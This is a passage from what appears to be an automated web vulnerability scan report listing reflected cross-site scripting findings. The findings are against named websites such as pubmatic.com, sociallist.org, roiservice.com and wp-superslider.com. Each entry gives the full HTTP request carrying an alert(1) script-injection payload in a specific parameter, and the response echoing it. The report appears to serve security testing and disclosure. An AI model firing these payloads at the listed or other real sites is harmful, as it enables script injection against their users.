Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DPrivacy%25253A%2525202o7.net%252520Explained%2526pidt%253D1%2526oid%253Dhttp%25253A//my.omniture.com/%2526ot%253DA; FLASH_ENABLED=yes; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; sc_locale=en_US; s_sv_s1=1@29@a//1296661247027/594025749283; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; sc_locale_numbers=en_US; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:31:44 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www460
Content-Type: text/html
Connection: close
Content-Length: 27586

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
history_id":"20123132637709","excel":"","came_from":"%2Fp%2Fsuite%2F1.2%2Findex.html%3Fa%3DMain.SSOHelp","REQUEST_URI":"/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67e86ee"-alert(1)-"66ebe3920b5&jpj=95253754444132","OBERON_START_DATE":null,"jpj_old":"95253754444132"};
Omniture.Config.reportname = '';
Omniture.Config.page_id = '100000';
Omniture.Config.recent_date_range_js = null;
Omniture.Con
...[SNIP]...

4.148. http://showads.pubmatic.com/AdServer/AdServerServlet [frameName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46054'-alert(1)-'3516148de48 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame1262482626346054'-alert(1)-'3516148de48&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:21 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubfreq_26263_21091_1452320870=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:21 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1565

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame1262482626346054'-alert(1)-'3516148de48" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=iGYAAJdmAABjUgAAAAAAAAAAAAAAAAAAAAAAAAAAAACtagAAzwAAAKAAAABYAgAAAAAAAAEAAAA0QUMzMkRCMC0wQjZBLTQ
...[SNIP]...

4.149. http://showads.pubmatic.com/AdServer/AdServerServlet [pageURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e7a8'-alert(1)-'8af0a80e42e was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent8e7a8'-alert(1)-'8af0a80e42e&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:18 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:18 GMT; path=/
Set-Cookie: pubfreq_26263_21091_710083775=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:18 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1565

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
act=0.000000&kadNetFrequecy=1&kadwidth=160&kadheight=600&kltstamp=1296661278&indirectAdId=27309&adServerOptimizerId=1&ranreq=0.3423423212952912&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent8e7a8'-alert(1)-'8af0a80e42e">
...[SNIP]...

4.150. http://showads.pubmatic.com/AdServer/AdServerServlet [ranreq parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://showads.pubmatic.com
Path:	/AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ddb'-alert(1)-'75dd4dca154 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26248&siteId=26263&adId=21091&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=3366FF&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent&frameName=http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263&kltstamp=2011-1-1%209%3A23%3A30&ranreq=0.3423423212952912b0ddb'-alert(1)-'75dd4dca154&timezone=-6&screenResolution=1920x1200&inIframe=0&adPosition=937x643&adVisibility=3 HTTP/1.1
Host: showads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/App/PerformMDLPDealsContent?deal_id=promotions&cnt=PRO&type=oa_qs35daf%22style%3d%22x%3aexpression(alert(1))%221333ba1041f
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_16=226-uid:3271971346728586924; KRTBCOOKIE_57=476-uid:4760492999213801733; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:21 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: pubfreq_26263=; domain=pubmatic.com; expires=Fri, 04-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubtime_26263=TMC; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Set-Cookie: pubfreq_26263_21091_187138684=207-1; domain=pubmatic.com; expires=Wed, 02-Feb-2011 16:21:21 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Thu, 03-Feb-2011 15:41:21 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 1565

document.write('<div id="http_www_orbitz_comAppPerformMDLPDealsContentkomli_ads_frame12624826263" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
Id=26263&adId=21091&adServerId=207&kefact=1.100000&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=160&kadheight=600&kltstamp=1296661281&indirectAdId=27309&adServerOptimizerId=1&ranreq=0.3423423212952912b0ddb'-alert(1)-'75dd4dca154&pageURL=http://www.orbitz.com/App/PerformMDLPDealsContent">
...[SNIP]...

4.151. http://sociallist.org/submit.php [lang parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5be"><script>alert(1)</script>51b0587d24d was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage">
...[SNIP]...

4.152. http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c92e7"><script>alert(1)</script>c161344b8ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1 HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 18868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1">
...[SNIP]...

4.153. http://sociallist.org/submit.php [tag parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The value of the tag request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94680"><script>alert(1)</script>385c4aafbf was submitted in the tag parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage">
...[SNIP]...

4.154. http://sociallist.org/submit.php [text parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The value of the text request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf26"><script>alert(1)</script>4d8458ad73a was submitted in the text parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a">
...[SNIP]...

4.155. http://sociallist.org/submit.php [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5df9"><script>alert(1)</script>6ca859d5791 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage">
...[SNIP]...

4.156. http://sociallist.org/submit.php [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae34"><script>alert(1)</script>c10119c2686 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage">
...[SNIP]...

4.157. http://sociallist.org/submit.php [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sociallist.org
Path:	/submit.php

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a978a"><script>alert(1)</script>2b441ed7164 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage">
...[SNIP]...

4.158. http://track.roiservice.com/track/track.aspx [ROIID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://track.roiservice.com
Path:	/track/track.aspx

Issue detail

The value of the ROIID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d61'%3balert(1)//83d5529551f was submitted in the ROIID parameter. This input was echoed as e5d61';alert(1)//83d5529551f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /track/track.aspx?ROIID=936138107000019e5d61'%3balert(1)//83d5529551f HTTP/1.1
Host: track.roiservice.com
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: msid936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; expires=Sun, 02-Feb-2031 15:42:42 GMT; path=/
Set-Cookie: GTT936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; path=/
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 1656

var ROIID='936138107000019e5d61';alert(1)//83d5529551f';var sn = 'ddc990c0fc744d2cbe0ff4ded6312952';var dm=null;var gt_url = '';var gt_cid= '';var xDate=new Date();xDate.setFullYear(xDate.getFullYear() + 1);function au(nm, vl){gt_url+='&' + nm + '=' + esc
...[SNIP]...

4.159. http://wp-superslider.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce46"><script>alert(1)</script>2b12960bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ce46\"><script>alert(1)</script>2b12960bb2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2ce46"><script>alert(1)</script>2b12960bb2=1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 406 Not Acceptable
Date: Wed, 02 Feb 2011 15:42:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Set-Cookie: bb2_screener_=1296661378+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296661378; expires=Thu, 02-Feb-2012 15:42:58 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="redirect_to" value="/?2ce46\"><script>alert(1)</script>2b12960bb2=1" />
...[SNIP]...

4.160. http://wp-superslider.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1c7"><script>alert(1)</script>59b95746b00 was submitted in the REST URL parameter 1. This input was echoed as ba1c7\"><script>alert(1)</script>59b95746b00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.phpba1c7"><script>alert(1)</script>59b95746b00 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674627+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674628; expires=Thu, 02-Feb-2012 19:23:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/index.phpba1c7\"><script>alert(1)</script>59b95746b00" />
...[SNIP]...

4.161. http://wp-superslider.com/site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
